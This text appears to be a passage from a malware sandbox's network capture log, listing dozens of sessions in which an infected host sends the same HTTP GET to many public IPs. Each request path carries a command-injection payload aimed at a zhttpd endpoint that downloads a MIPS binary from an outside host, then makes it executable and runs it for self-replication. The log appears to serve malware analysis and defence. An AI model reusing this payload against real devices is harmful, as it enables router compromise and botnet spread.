                                                        Feb 2, 2024 06:21:26.258975029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8539192.168.2.143962893.189.181.169443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.259000063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8540192.168.2.144934674.130.8.65443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.259026051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8541192.168.2.145681675.136.99.137443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.259064913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8542192.168.2.1438542137.11.175.67443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.259099960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8543192.168.2.1433840164.189.179.84443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.259141922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8544192.168.2.1455084212.188.12.121443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.259166956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8545192.168.2.143704898.82.212.18443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.259207010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8546192.168.2.145568431.82.210.15443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.259243965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8547192.168.2.1452418220.149.153.49443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.259315014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8548192.168.2.1435462207.202.33.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.259355068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8549192.168.2.1450260157.33.14.152443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.259382010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8550192.168.2.145643253.166.104.240443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.259418011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8551192.168.2.144798220.166.165.105443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.259465933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8552192.168.2.1450642114.190.251.180443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.259505033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8553192.168.2.1446508176.179.164.255443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.259531975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8554192.168.2.1452886184.103.122.201443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.259573936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8555192.168.2.145760617.53.152.89443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.259608030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8556192.168.2.145792058.4.242.172443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.259668112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8557192.168.2.1434648139.158.97.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.259699106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8558192.168.2.1442170209.165.170.144443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.259747028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8559192.168.2.143360637.230.141.27443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.259785891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8560192.168.2.1455712163.252.201.15443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.259819031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8561192.168.2.145917275.17.222.123443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.259860039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8562192.168.2.144469053.136.210.102443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.273116112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8563192.168.2.1452170147.178.222.156443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.273250103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8564192.168.2.1448302117.19.229.3443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.273279905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8565192.168.2.1448388139.68.217.88443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.273319006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8566192.168.2.145165624.160.7.202443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.273353100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8567192.168.2.1443244162.19.121.232443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.273403883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8568192.168.2.144208434.112.117.34443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.273447037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8569192.168.2.143733445.46.119.74443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.273478985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8570192.168.2.145468063.190.30.175443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.273513079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8571192.168.2.144971497.126.72.207443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.273566961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8572192.168.2.143310885.144.13.233443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.273597956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8573192.168.2.144109888.119.31.194443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.273663044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8574192.168.2.145294480.37.201.14443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.273675919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8575192.168.2.144974223.206.142.73443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.273722887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8576192.168.2.1437866120.80.11.1443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.273765087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8577192.168.2.1434710221.121.29.47443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.273794889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8578192.168.2.14518609.37.90.156443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.273849010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8579192.168.2.1453944171.90.235.71443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.273909092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8580192.168.2.143849247.212.6.153443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.273929119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8581192.168.2.1459980163.176.39.38443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.273953915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8582192.168.2.145256268.171.25.253443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.274030924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8583192.168.2.1435764140.35.47.42443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.274070024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8584192.168.2.145437076.109.222.127443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.274105072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8585192.168.2.1444812198.214.124.5443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.274143934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8586192.168.2.1436336158.148.50.191443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.274175882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8587192.168.2.144239681.71.72.11443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.274224043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8588192.168.2.144671869.179.55.34443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.274255991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8589192.168.2.144646659.14.46.251443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.274311066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8590192.168.2.144996880.108.138.184443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.274342060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8591192.168.2.145866463.52.191.109443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.274394989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8592192.168.2.1456216144.161.21.164443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.274424076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8593192.168.2.145971893.160.186.27443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.274461985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8594192.168.2.1437198200.198.228.10443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.274503946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8595192.168.2.143809257.117.241.226443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.274571896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8596192.168.2.1457336160.142.246.127443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.274625063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8597192.168.2.1439216159.129.99.74443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.274661064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8598192.168.2.1440422112.208.216.73443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.274707079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8599192.168.2.1452808120.6.82.111443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.274736881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8600192.168.2.1460726142.228.169.55443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.274781942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8601192.168.2.1448338201.112.39.119443
                                                        TimestampBytes transferredDirectionData
